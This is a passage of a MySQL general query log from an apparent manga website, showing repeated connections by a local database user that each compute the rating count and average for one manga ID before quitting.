manga_id = '107' order by created desc 330647617 Quit 330647618 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647618 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330647618 Quit 330647619 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647619 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330647619 Quit 330647620 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647620 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330647620 Quit 330647621 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647621 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330647621 Quit 330647622 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647622 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330647622 Quit 330647623 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647623 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330647623 Quit 330647624 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647624 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330647624 Quit 330647625 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647625 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330647625 Quit 330647626 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647626 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330647626 Quit 330647627 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647627 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330647627 Quit 330647628 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647628 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330647628 Quit 330647629 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647629 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330647629 Quit 330647630 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647630 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330647630 Quit 330647631 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647631 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330647631 Quit 330647632 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647632 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330647632 Quit 330647633 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647633 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330647633 Quit 330647634 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647634 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330647634 Quit 330647635 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647635 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330647635 Quit 330647636 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647636 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330647636 Quit 330647637 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647637 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330647637 Quit 330647638 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647638 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330647638 Quit 330647639 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647639 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330647639 Quit 330647640 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647640 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330647640 Quit 330647641 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647641 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330647641 Quit 330647642 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647642 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330647642 Quit 330647643 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647643 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330647643 Quit 330647644 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647644 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330647644 Quit 330647645 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647645 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330647645 Quit 330647646 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647646 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330647646 Quit 330647647 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647647 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330647647 Quit 330647648 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647648 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330647648 Quit 330647649 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647649 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330647649 Quit 330647650 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647650 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330647650 Quit 330647651 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647651 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330647651 Quit 330647652 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647652 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330647652 Quit 330647653 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647653 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330647653 Quit 330647654 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647654 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330647654 Quit 330647655 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647655 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330647655 Quit 330647656 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647656 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330647656 Quit 330647657 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647657 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330647657 Quit 330647658 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647658 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330647658 Quit 330647659 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647659 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330647659 Quit 330647660 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647660 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330647660 Quit 330647661 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647661 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330647661 Quit 330647662 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647662 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330647662 Quit 330647663 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647663 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330647663 Quit 330647664 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647664 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330647664 Quit 330647665 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647665 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330647665 Quit 330647666 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647666 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330647666 Quit 330647667 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647667 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330647667 Quit 330647668 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647668 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330647668 Quit 330647669 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647669 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330647669 Quit 330647670 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647670 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330647670 Quit 330647671 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647671 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330647671 Quit 330647672 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647672 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330647672 Quit 330647673 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647673 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330647673 Quit 330647674 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647674 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330647674 Quit 330647675 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647675 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330647675 Quit 330647676 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647676 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330647676 Quit 330647677 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647677 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330647677 Quit 330647678 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647678 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330647678 Quit 330647679 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647679 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330647679 Quit 330647680 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647680 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330647680 Quit 330647681 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647681 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330647681 Quit 330647682 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647682 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330647682 Quit 330647683 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647683 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330647683 Quit 330647684 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647684 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330647684 Quit 330647685 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647685 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330647685 Quit 330647686 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647686 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330647686 Quit 330647687 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647687 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330647687 Quit 330647688 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647688 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330647688 Quit 330647689 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647689 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330647689 Quit 330647690 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647690 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330647690 Quit 330647691 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647691 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330647691 Quit 330647692 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647692 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330647692 Quit 330647693 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647693 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330647693 Quit 330647694 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647694 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330647694 Quit 330647695 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647695 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330647695 Quit 330647696 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647696 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330647696 Quit 330647697 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647697 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330647697 Quit 330647698 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647698 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330647698 Quit 330647699 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647699 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330647699 Quit 330647700 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647700 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330647700 Quit 330647701 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647701 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330647701 Quit 330647702 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647702 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330647702 Quit 330647703 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647703 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330647703 Quit 330647704 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647704 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330647704 Quit 330647705 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647705 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330647705 Quit 330647706 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647706 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330647706 Quit 330647707 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647707 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330647707 Quit 330647708 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647708 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330647708 Quit 330647709 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647709 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330647709 Quit 330647710 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647710 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330647710 Quit 330647711 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647711 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330647711 Quit 330647712 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647712 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330647712 Quit 330647713 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647713 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330647713 Quit 330647714 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647714 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330647714 Quit 330647715 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647715 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330647715 Quit 330647716 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647716 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330647716 Quit 330647717 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647717 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330647717 Quit 330647718 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647718 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330647718 Quit 330647719 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647719 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330647719 Quit 330647720 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647720 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330647720 Quit 330647721 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647721 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330647721 Quit 330647722 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647722 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330647722 Quit 330647723 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647723 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330647723 Quit 330647724 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647724 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330647724 Quit 330647725 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647725 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330647725 Quit 330647726 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647726 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330647726 Quit 330647727 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647727 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330647727 Quit 330647728 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647728 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330647728 Quit 330647729 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647729 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330647729 Quit 330647730 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647730 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330647730 Quit 330647731 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647731 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330647731 Quit 330647732 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647732 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330647732 Quit 330647733 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647733 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330647733 Quit 330647734 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647734 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330647734 Quit 330647735 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647735 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330647735 Quit 330647736 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647736 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330647736 Quit 330647737 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647737 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330647737 Quit 330647738 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647738 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330647738 Quit 330647739 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647739 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330647739 Quit 330647740 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647740 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330647740 Quit 330647741 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647741 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330647741 Quit 330647742 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647742 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330647742 Quit 330647743 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647743 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330647743 Quit 330647744 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647744 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330647744 Quit 330647745 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647745 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330647745 Quit 330647746 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647746 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330647746 Quit 330647747 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647747 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330647747 Quit 330647748 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647748 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330647748 Quit 330647749 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647749 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330647749 Quit 330647750 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647750 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330647750 Quit 330647751 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647751 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330647751 Quit 330647752 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647752 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330647752 Quit 330647753 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647753 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330647753 Quit 330647754 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647754 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330647754 Quit 330647755 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647755 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330647755 Quit 330647756 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647756 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330647756 Quit 330647757 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647757 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330647757 Quit 330647758 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647758 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330647758 Quit 330647759 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647759 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330647759 Quit 330647760 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647760 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330647760 Quit 330647761 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647761 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330647761 Quit 330647762 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647762 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330647762 Quit 330647763 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647763 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330647763 Quit 330647764 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647764 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330647764 Quit 330647765 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647765 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330647765 Quit 330647766 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647766 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330647766 Quit 330647767 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647767 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330647767 Quit 330647768 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647768 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330647768 Quit 330647769 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647769 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330647769 Quit 330647770 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647770 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = 